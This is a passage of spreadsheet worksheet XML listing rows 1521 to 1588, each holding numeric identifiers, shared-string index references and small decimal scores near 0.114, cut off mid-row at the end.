        <v>23302.0</v>
      </c>
      <c r="B1521" s="2">
        <v>5.4078662E7</v>
      </c>
      <c r="C1521" s="2" t="s">
        <v>1382</v>
      </c>
      <c r="D1521" s="2">
        <v>1.0</v>
      </c>
      <c r="E1521" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1521" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1522" ht="15.75" customHeight="1">
      <c r="A1522" s="1">
        <v>23364.0</v>
      </c>
      <c r="B1522" s="2">
        <v>5517283.0</v>
      </c>
      <c r="C1522" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="D1522" s="2">
        <v>1.0</v>
      </c>
      <c r="E1522" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1522" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1523" ht="15.75" customHeight="1">
      <c r="A1523" s="1">
        <v>23365.0</v>
      </c>
      <c r="B1523" s="2">
        <v>5.51845E7</v>
      </c>
      <c r="C1523" s="2" t="s">
        <v>1384</v>
      </c>
      <c r="D1523" s="2">
        <v>1.0</v>
      </c>
      <c r="E1523" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1523" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1524" ht="15.75" customHeight="1">
      <c r="A1524" s="1">
        <v>23490.0</v>
      </c>
      <c r="B1524" s="2">
        <v>5751103.0</v>
      </c>
      <c r="C1524" s="2" t="s">
        <v>1385</v>
      </c>
      <c r="D1524" s="2">
        <v>1.0</v>
      </c>
      <c r="E1524" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1524" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1525" ht="15.75" customHeight="1">
      <c r="A1525" s="1">
        <v>23672.0</v>
      </c>
      <c r="B1525" s="2">
        <v>6922374.0</v>
      </c>
      <c r="C1525" s="2" t="s">
        <v>1386</v>
      </c>
      <c r="D1525" s="2">
        <v>1.0</v>
      </c>
      <c r="E1525" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1525" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1526" ht="15.75" customHeight="1">
      <c r="A1526" s="1">
        <v>24014.0</v>
      </c>
      <c r="B1526" s="2">
        <v>9302108.0</v>
      </c>
      <c r="C1526" s="2" t="s">
        <v>1387</v>
      </c>
      <c r="D1526" s="2">
        <v>1.0</v>
      </c>
      <c r="E1526" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1526" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1527" ht="15.75" customHeight="1">
      <c r="A1527" s="1">
        <v>24966.0</v>
      </c>
      <c r="B1527" s="2">
        <v>1.2601523E7</v>
      </c>
      <c r="C1527" s="2" t="s">
        <v>1388</v>
      </c>
      <c r="D1527" s="2">
        <v>1.0</v>
      </c>
      <c r="E1527" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1527" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1528" ht="15.75" customHeight="1">
      <c r="A1528" s="1">
        <v>25781.0</v>
      </c>
      <c r="B1528" s="2">
        <v>1.4660435E7</v>
      </c>
      <c r="C1528" s="2" t="s">
        <v>1389</v>
      </c>
      <c r="D1528" s="2">
        <v>1.0</v>
      </c>
      <c r="E1528" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1528" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1529" ht="15.75" customHeight="1">
      <c r="A1529" s="1">
        <v>26085.0</v>
      </c>
      <c r="B1529" s="2">
        <v>1.5657866E7</v>
      </c>
      <c r="C1529" s="2" t="s">
        <v>1390</v>
      </c>
      <c r="D1529" s="2">
        <v>1.0</v>
      </c>
      <c r="E1529" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1529" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1530" ht="15.75" customHeight="1">
      <c r="A1530" s="1">
        <v>26183.0</v>
      </c>
      <c r="B1530" s="2">
        <v>1.6153138E7</v>
      </c>
      <c r="C1530" s="2" t="s">
        <v>1391</v>
      </c>
      <c r="D1530" s="2">
        <v>1.0</v>
      </c>
      <c r="E1530" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1530" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1531" ht="15.75" customHeight="1">
      <c r="A1531" s="1">
        <v>26299.0</v>
      </c>
      <c r="B1531" s="2">
        <v>1.6562911E7</v>
      </c>
      <c r="C1531" s="2" t="s">
        <v>1392</v>
      </c>
      <c r="D1531" s="2">
        <v>1.0</v>
      </c>
      <c r="E1531" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1531" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1532" ht="15.75" customHeight="1">
      <c r="A1532" s="1">
        <v>26333.0</v>
      </c>
      <c r="B1532" s="2">
        <v>1.6720138E7</v>
      </c>
      <c r="C1532" s="2" t="s">
        <v>1393</v>
      </c>
      <c r="D1532" s="2">
        <v>1.0</v>
      </c>
      <c r="E1532" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1532" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1533" ht="15.75" customHeight="1">
      <c r="A1533" s="1">
        <v>26843.0</v>
      </c>
      <c r="B1533" s="2">
        <v>1.8975344E7</v>
      </c>
      <c r="C1533" s="2" t="s">
        <v>1366</v>
      </c>
      <c r="D1533" s="2">
        <v>1.0</v>
      </c>
      <c r="E1533" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1533" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1534" ht="15.75" customHeight="1">
      <c r="A1534" s="1">
        <v>26983.0</v>
      </c>
      <c r="B1534" s="2">
        <v>1.9756104E7</v>
      </c>
      <c r="C1534" s="2" t="s">
        <v>1394</v>
      </c>
      <c r="D1534" s="2">
        <v>1.0</v>
      </c>
      <c r="E1534" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1534" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1535" ht="15.75" customHeight="1">
      <c r="A1535" s="1">
        <v>27081.0</v>
      </c>
      <c r="B1535" s="2">
        <v>2.0483762E7</v>
      </c>
      <c r="C1535" s="2" t="s">
        <v>1395</v>
      </c>
      <c r="D1535" s="2">
        <v>1.0</v>
      </c>
      <c r="E1535" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1535" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1536" ht="15.75" customHeight="1">
      <c r="A1536" s="1">
        <v>27095.0</v>
      </c>
      <c r="B1536" s="2">
        <v>2.05344E7</v>
      </c>
      <c r="C1536" s="2" t="s">
        <v>1396</v>
      </c>
      <c r="D1536" s="2">
        <v>1.0</v>
      </c>
      <c r="E1536" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1536" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1537" ht="15.75" customHeight="1">
      <c r="A1537" s="1">
        <v>27126.0</v>
      </c>
      <c r="B1537" s="2">
        <v>2.0721709E7</v>
      </c>
      <c r="C1537" s="2" t="s">
        <v>1397</v>
      </c>
      <c r="D1537" s="2">
        <v>1.0</v>
      </c>
      <c r="E1537" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1537" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1538" ht="15.75" customHeight="1">
      <c r="A1538" s="1">
        <v>27764.0</v>
      </c>
      <c r="B1538" s="2">
        <v>2.3107575E7</v>
      </c>
      <c r="C1538" s="2" t="s">
        <v>1398</v>
      </c>
      <c r="D1538" s="2">
        <v>1.0</v>
      </c>
      <c r="E1538" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1538" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1539" ht="15.75" customHeight="1">
      <c r="A1539" s="1">
        <v>27847.0</v>
      </c>
      <c r="B1539" s="2">
        <v>2.3425148E7</v>
      </c>
      <c r="C1539" s="2" t="s">
        <v>1399</v>
      </c>
      <c r="D1539" s="2">
        <v>1.0</v>
      </c>
      <c r="E1539" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1539" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1540" ht="15.75" customHeight="1">
      <c r="A1540" s="1">
        <v>28286.0</v>
      </c>
      <c r="B1540" s="2">
        <v>2.5523601E7</v>
      </c>
      <c r="C1540" s="2" t="s">
        <v>1400</v>
      </c>
      <c r="D1540" s="2">
        <v>1.0</v>
      </c>
      <c r="E1540" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1540" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1541" ht="15.75" customHeight="1">
      <c r="A1541" s="1">
        <v>28464.0</v>
      </c>
      <c r="B1541" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C1541" s="2" t="s">
        <v>1401</v>
      </c>
      <c r="D1541" s="2">
        <v>1.0</v>
      </c>
      <c r="E1541" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1541" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1542" ht="15.75" customHeight="1">
      <c r="A1542" s="1">
        <v>28564.0</v>
      </c>
      <c r="B1542" s="2">
        <v>2.6922467E7</v>
      </c>
      <c r="C1542" s="2" t="s">
        <v>1402</v>
      </c>
      <c r="D1542" s="2">
        <v>1.0</v>
      </c>
      <c r="E1542" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1542" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1543" ht="15.75" customHeight="1">
      <c r="A1543" s="1">
        <v>28598.0</v>
      </c>
      <c r="B1543" s="2">
        <v>2.7024742E7</v>
      </c>
      <c r="C1543" s="2" t="s">
        <v>1403</v>
      </c>
      <c r="D1543" s="2">
        <v>1.0</v>
      </c>
      <c r="E1543" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1543" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1544" ht="15.75" customHeight="1">
      <c r="A1544" s="1">
        <v>29160.0</v>
      </c>
      <c r="B1544" s="2">
        <v>3.0618919E7</v>
      </c>
      <c r="C1544" s="2" t="s">
        <v>1404</v>
      </c>
      <c r="D1544" s="2">
        <v>1.0</v>
      </c>
      <c r="E1544" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1544" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1545" ht="15.75" customHeight="1">
      <c r="A1545" s="1">
        <v>29161.0</v>
      </c>
      <c r="B1545" s="2">
        <v>3.0618919E7</v>
      </c>
      <c r="C1545" s="2" t="s">
        <v>1405</v>
      </c>
      <c r="D1545" s="2">
        <v>1.0</v>
      </c>
      <c r="E1545" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1545" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1546" ht="15.75" customHeight="1">
      <c r="A1546" s="1">
        <v>29322.0</v>
      </c>
      <c r="B1546" s="2">
        <v>3.1313843E7</v>
      </c>
      <c r="C1546" s="2" t="s">
        <v>1406</v>
      </c>
      <c r="D1546" s="2">
        <v>1.0</v>
      </c>
      <c r="E1546" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1546" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1547" ht="15.75" customHeight="1">
      <c r="A1547" s="1">
        <v>29512.0</v>
      </c>
      <c r="B1547" s="2">
        <v>3.2761921E7</v>
      </c>
      <c r="C1547" s="2" t="s">
        <v>1371</v>
      </c>
      <c r="D1547" s="2">
        <v>1.0</v>
      </c>
      <c r="E1547" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1547" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1548" ht="15.75" customHeight="1">
      <c r="A1548" s="1">
        <v>29519.0</v>
      </c>
      <c r="B1548" s="2">
        <v>3.2766527E7</v>
      </c>
      <c r="C1548" s="2" t="s">
        <v>1407</v>
      </c>
      <c r="D1548" s="2">
        <v>1.0</v>
      </c>
      <c r="E1548" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1548" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1549" ht="15.75" customHeight="1">
      <c r="A1549" s="1">
        <v>29627.0</v>
      </c>
      <c r="B1549" s="2">
        <v>3.3680775E7</v>
      </c>
      <c r="C1549" s="2" t="s">
        <v>1408</v>
      </c>
      <c r="D1549" s="2">
        <v>1.0</v>
      </c>
      <c r="E1549" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1549" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1550" ht="15.75" customHeight="1">
      <c r="A1550" s="1">
        <v>29679.0</v>
      </c>
      <c r="B1550" s="2">
        <v>3.3994146E7</v>
      </c>
      <c r="C1550" s="2" t="s">
        <v>1409</v>
      </c>
      <c r="D1550" s="2">
        <v>1.0</v>
      </c>
      <c r="E1550" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1550" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1551" ht="15.75" customHeight="1">
      <c r="A1551" s="1">
        <v>29965.0</v>
      </c>
      <c r="B1551" s="2">
        <v>3.6087617E7</v>
      </c>
      <c r="C1551" s="2" t="s">
        <v>1373</v>
      </c>
      <c r="D1551" s="2">
        <v>1.0</v>
      </c>
      <c r="E1551" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1551" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1552" ht="15.75" customHeight="1">
      <c r="A1552" s="1">
        <v>30194.0</v>
      </c>
      <c r="B1552" s="2">
        <v>3.7232715E7</v>
      </c>
      <c r="C1552" s="2" t="s">
        <v>1410</v>
      </c>
      <c r="D1552" s="2">
        <v>1.0</v>
      </c>
      <c r="E1552" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1552" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1553" ht="15.75" customHeight="1">
      <c r="A1553" s="1">
        <v>30334.0</v>
      </c>
      <c r="B1553" s="2">
        <v>3.8138261E7</v>
      </c>
      <c r="C1553" s="2" t="s">
        <v>1411</v>
      </c>
      <c r="D1553" s="2">
        <v>1.0</v>
      </c>
      <c r="E1553" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1553" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1554" ht="15.75" customHeight="1">
      <c r="A1554" s="1">
        <v>30394.0</v>
      </c>
      <c r="B1554" s="2">
        <v>3.8672131E7</v>
      </c>
      <c r="C1554" s="2" t="s">
        <v>1412</v>
      </c>
      <c r="D1554" s="2">
        <v>1.0</v>
      </c>
      <c r="E1554" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1554" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1555" ht="15.75" customHeight="1">
      <c r="A1555" s="1">
        <v>30423.0</v>
      </c>
      <c r="B1555" s="2">
        <v>3.894059E7</v>
      </c>
      <c r="C1555" s="2" t="s">
        <v>1413</v>
      </c>
      <c r="D1555" s="2">
        <v>1.0</v>
      </c>
      <c r="E1555" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1555" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1556" ht="15.75" customHeight="1">
      <c r="A1556" s="1">
        <v>30606.0</v>
      </c>
      <c r="B1556" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C1556" s="2" t="s">
        <v>1414</v>
      </c>
      <c r="D1556" s="2">
        <v>1.0</v>
      </c>
      <c r="E1556" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1556" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1557" ht="15.75" customHeight="1">
      <c r="A1557" s="1">
        <v>30631.0</v>
      </c>
      <c r="B1557" s="2">
        <v>4.1394341E7</v>
      </c>
      <c r="C1557" s="2" t="s">
        <v>1415</v>
      </c>
      <c r="D1557" s="2">
        <v>1.0</v>
      </c>
      <c r="E1557" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1557" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1558" ht="15.75" customHeight="1">
      <c r="A1558" s="1">
        <v>31492.0</v>
      </c>
      <c r="B1558" s="2">
        <v>5062934.0</v>
      </c>
      <c r="C1558" s="2" t="s">
        <v>1416</v>
      </c>
      <c r="D1558" s="2">
        <v>1.0</v>
      </c>
      <c r="E1558" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1558" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1559" ht="15.75" customHeight="1">
      <c r="A1559" s="1">
        <v>31532.0</v>
      </c>
      <c r="B1559" s="2">
        <v>5.0929075E7</v>
      </c>
      <c r="C1559" s="2" t="s">
        <v>1417</v>
      </c>
      <c r="D1559" s="2">
        <v>1.0</v>
      </c>
      <c r="E1559" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1559" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1560" ht="15.75" customHeight="1">
      <c r="A1560" s="1">
        <v>31553.0</v>
      </c>
      <c r="B1560" s="2">
        <v>5.1146519E7</v>
      </c>
      <c r="C1560" s="2" t="s">
        <v>1418</v>
      </c>
      <c r="D1560" s="2">
        <v>1.0</v>
      </c>
      <c r="E1560" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1560" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1561" ht="15.75" customHeight="1">
      <c r="A1561" s="1">
        <v>31823.0</v>
      </c>
      <c r="B1561" s="2">
        <v>5253673.0</v>
      </c>
      <c r="C1561" s="2" t="s">
        <v>1419</v>
      </c>
      <c r="D1561" s="2">
        <v>1.0</v>
      </c>
      <c r="E1561" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1561" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1562" ht="15.75" customHeight="1">
      <c r="A1562" s="1">
        <v>32223.0</v>
      </c>
      <c r="B1562" s="2">
        <v>5488862.0</v>
      </c>
      <c r="C1562" s="2" t="s">
        <v>1420</v>
      </c>
      <c r="D1562" s="2">
        <v>1.0</v>
      </c>
      <c r="E1562" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1562" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1563" ht="15.75" customHeight="1">
      <c r="A1563" s="1">
        <v>32261.0</v>
      </c>
      <c r="B1563" s="2">
        <v>5.5128239E7</v>
      </c>
      <c r="C1563" s="2" t="s">
        <v>1421</v>
      </c>
      <c r="D1563" s="2">
        <v>1.0</v>
      </c>
      <c r="E1563" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1563" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1564" ht="15.75" customHeight="1">
      <c r="A1564" s="1">
        <v>32266.0</v>
      </c>
      <c r="B1564" s="2">
        <v>5.5184499E7</v>
      </c>
      <c r="C1564" s="2" t="s">
        <v>1384</v>
      </c>
      <c r="D1564" s="2">
        <v>1.0</v>
      </c>
      <c r="E1564" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1564" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1565" ht="15.75" customHeight="1">
      <c r="A1565" s="1">
        <v>32490.0</v>
      </c>
      <c r="B1565" s="2">
        <v>5.7006194E7</v>
      </c>
      <c r="C1565" s="2" t="s">
        <v>1422</v>
      </c>
      <c r="D1565" s="2">
        <v>1.0</v>
      </c>
      <c r="E1565" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1565" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1566" ht="15.75" customHeight="1">
      <c r="A1566" s="1">
        <v>32877.0</v>
      </c>
      <c r="B1566" s="2">
        <v>6336975.0</v>
      </c>
      <c r="C1566" s="2" t="s">
        <v>1423</v>
      </c>
      <c r="D1566" s="2">
        <v>1.0</v>
      </c>
      <c r="E1566" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1566" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1567" ht="15.75" customHeight="1">
      <c r="A1567" s="1">
        <v>32925.0</v>
      </c>
      <c r="B1567" s="2">
        <v>6423393.0</v>
      </c>
      <c r="C1567" s="2" t="s">
        <v>1424</v>
      </c>
      <c r="D1567" s="2">
        <v>1.0</v>
      </c>
      <c r="E1567" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1567" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1568" ht="15.75" customHeight="1">
      <c r="A1568" s="1">
        <v>32930.0</v>
      </c>
      <c r="B1568" s="2">
        <v>6429983.0</v>
      </c>
      <c r="C1568" s="2" t="s">
        <v>1425</v>
      </c>
      <c r="D1568" s="2">
        <v>1.0</v>
      </c>
      <c r="E1568" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1568" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1569" ht="15.75" customHeight="1">
      <c r="A1569" s="1">
        <v>33023.0</v>
      </c>
      <c r="B1569" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C1569" s="2" t="s">
        <v>1426</v>
      </c>
      <c r="D1569" s="2">
        <v>1.0</v>
      </c>
      <c r="E1569" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1569" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1570" ht="15.75" customHeight="1">
      <c r="A1570" s="1">
        <v>33080.0</v>
      </c>
      <c r="B1570" s="2">
        <v>6922373.0</v>
      </c>
      <c r="C1570" s="2" t="s">
        <v>1386</v>
      </c>
      <c r="D1570" s="2">
        <v>1.0</v>
      </c>
      <c r="E1570" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1570" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1571" ht="15.75" customHeight="1">
      <c r="A1571" s="1">
        <v>33085.0</v>
      </c>
      <c r="B1571" s="2">
        <v>6934952.0</v>
      </c>
      <c r="C1571" s="2" t="s">
        <v>1427</v>
      </c>
      <c r="D1571" s="2">
        <v>1.0</v>
      </c>
      <c r="E1571" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1571" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1572" ht="15.75" customHeight="1">
      <c r="A1572" s="1">
        <v>33416.0</v>
      </c>
      <c r="B1572" s="2">
        <v>7743350.0</v>
      </c>
      <c r="C1572" s="2" t="s">
        <v>1383</v>
      </c>
      <c r="D1572" s="2">
        <v>1.0</v>
      </c>
      <c r="E1572" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1572" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1573" ht="15.75" customHeight="1">
      <c r="A1573" s="1">
        <v>33804.0</v>
      </c>
      <c r="B1573" s="2">
        <v>8838505.0</v>
      </c>
      <c r="C1573" s="2" t="s">
        <v>1428</v>
      </c>
      <c r="D1573" s="2">
        <v>1.0</v>
      </c>
      <c r="E1573" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1573" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="1574" ht="15.75" customHeight="1">
      <c r="A1574" s="1">
        <v>14613.0</v>
      </c>
      <c r="B1574" s="2">
        <v>4.0258521E7</v>
      </c>
      <c r="C1574" s="2" t="s">
        <v>1429</v>
      </c>
      <c r="D1574" s="2">
        <v>1.0</v>
      </c>
      <c r="E1574" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1574" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="1575" ht="15.75" customHeight="1">
      <c r="A1575" s="1">
        <v>21413.0</v>
      </c>
      <c r="B1575" s="2">
        <v>2.1985014E7</v>
      </c>
      <c r="C1575" s="2" t="s">
        <v>1430</v>
      </c>
      <c r="D1575" s="2">
        <v>1.0</v>
      </c>
      <c r="E1575" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1575" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="1576" ht="15.75" customHeight="1">
      <c r="A1576" s="1">
        <v>21436.0</v>
      </c>
      <c r="B1576" s="2">
        <v>2.2198595E7</v>
      </c>
      <c r="C1576" s="2" t="s">
        <v>1431</v>
      </c>
      <c r="D1576" s="2">
        <v>1.0</v>
      </c>
      <c r="E1576" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1576" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="1577" ht="15.75" customHeight="1">
      <c r="A1577" s="1">
        <v>30741.0</v>
      </c>
      <c r="B1577" s="2">
        <v>4.4029816E7</v>
      </c>
      <c r="C1577" s="2" t="s">
        <v>1432</v>
      </c>
      <c r="D1577" s="2">
        <v>1.0</v>
      </c>
      <c r="E1577" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1577" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="1578" ht="15.75" customHeight="1">
      <c r="A1578" s="1">
        <v>31512.0</v>
      </c>
      <c r="B1578" s="2">
        <v>5.0738302E7</v>
      </c>
      <c r="C1578" s="2" t="s">
        <v>1433</v>
      </c>
      <c r="D1578" s="2">
        <v>1.0</v>
      </c>
      <c r="E1578" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1578" s="2">
        <v>0.1141414141414141</v>
      </c>
    </row>
    <row r="1579" ht="15.75" customHeight="1">
      <c r="A1579" s="1">
        <v>28423.0</v>
      </c>
      <c r="B1579" s="2">
        <v>2.6405418E7</v>
      </c>
      <c r="C1579" s="2" t="s">
        <v>1434</v>
      </c>
      <c r="D1579" s="2">
        <v>1.0</v>
      </c>
      <c r="E1579" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1579" s="2">
        <v>0.1140873015873016</v>
      </c>
    </row>
    <row r="1580" ht="15.75" customHeight="1">
      <c r="A1580" s="1">
        <v>2934.0</v>
      </c>
      <c r="B1580" s="2">
        <v>3.5938495E7</v>
      </c>
      <c r="C1580" s="2" t="s">
        <v>1435</v>
      </c>
      <c r="D1580" s="2">
        <v>1.0</v>
      </c>
      <c r="E1580" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1580" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="1581" ht="15.75" customHeight="1">
      <c r="A1581" s="1">
        <v>21612.0</v>
      </c>
      <c r="B1581" s="2">
        <v>2.4495069E7</v>
      </c>
      <c r="C1581" s="2" t="s">
        <v>1436</v>
      </c>
      <c r="D1581" s="2">
        <v>1.0</v>
      </c>
      <c r="E1581" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1581" s="2">
        <v>0.1140350877192983</v>
      </c>
    </row>
    <row r="1582" ht="15.75" customHeight="1">
      <c r="A1582" s="1">
        <v>24179.0</v>
      </c>
      <c r="B1582" s="2">
        <v>1.0239587E7</v>
      </c>
      <c r="C1582" s="2" t="s">
        <v>1437</v>
      </c>
      <c r="D1582" s="2">
        <v>1.0</v>
      </c>
      <c r="E1582" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1582" s="2">
        <v>0.1140350877192982</v>
      </c>
    </row>
    <row r="1583" ht="15.75" customHeight="1">
      <c r="A1583" s="1">
        <v>14270.0</v>
      </c>
      <c r="B1583" s="2">
        <v>3.8417449E7</v>
      </c>
      <c r="C1583" s="2" t="s">
        <v>1438</v>
      </c>
      <c r="D1583" s="2">
        <v>1.0</v>
      </c>
      <c r="E1583" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1583" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="1584" ht="15.75" customHeight="1">
      <c r="A1584" s="1">
        <v>23818.0</v>
      </c>
      <c r="B1584" s="2">
        <v>7973552.0</v>
      </c>
      <c r="C1584" s="2" t="s">
        <v>1439</v>
      </c>
      <c r="D1584" s="2">
        <v>1.0</v>
      </c>
      <c r="E1584" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1584" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="1585" ht="15.75" customHeight="1">
      <c r="A1585" s="1">
        <v>26327.0</v>
      </c>
      <c r="B1585" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C1585" s="2" t="s">
        <v>1440</v>
      </c>
      <c r="D1585" s="2">
        <v>1.0</v>
      </c>
      <c r="E1585" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1585" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="1586" ht="15.75" customHeight="1">
      <c r="A1586" s="1">
        <v>15168.0</v>
      </c>
      <c r="B1586" s="2">
        <v>4.2005294E7</v>
      </c>
      <c r="C1586" s="2" t="s">
        <v>1441</v>
      </c>
      <c r="D1586" s="2">
        <v>1.0</v>
      </c>
      <c r="E1586" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1586" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1587" ht="15.75" customHeight="1">
      <c r="A1587" s="1">
        <v>18786.0</v>
      </c>
      <c r="B1587" s="2">
        <v>5.3826992E7</v>
      </c>
      <c r="C1587" s="2" t="s">
        <v>1442</v>
      </c>
      <c r="D1587" s="2">
        <v>1.0</v>
      </c>
      <c r="E1587" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1587" s="2">
        <v>0.1139359698681733</v>
      </c>
    </row>
    <row r="1588" ht="15.75" customHeight="1">
      <c r="A1588" s="1">
        <v>21635.0</v>
      </c>
      <c r="B1588" s="2">
        <v>2.4677299E7</v>
      </c>
      <c r="C1588" s="2" t="s">
        <v>1443</v>
      </c>
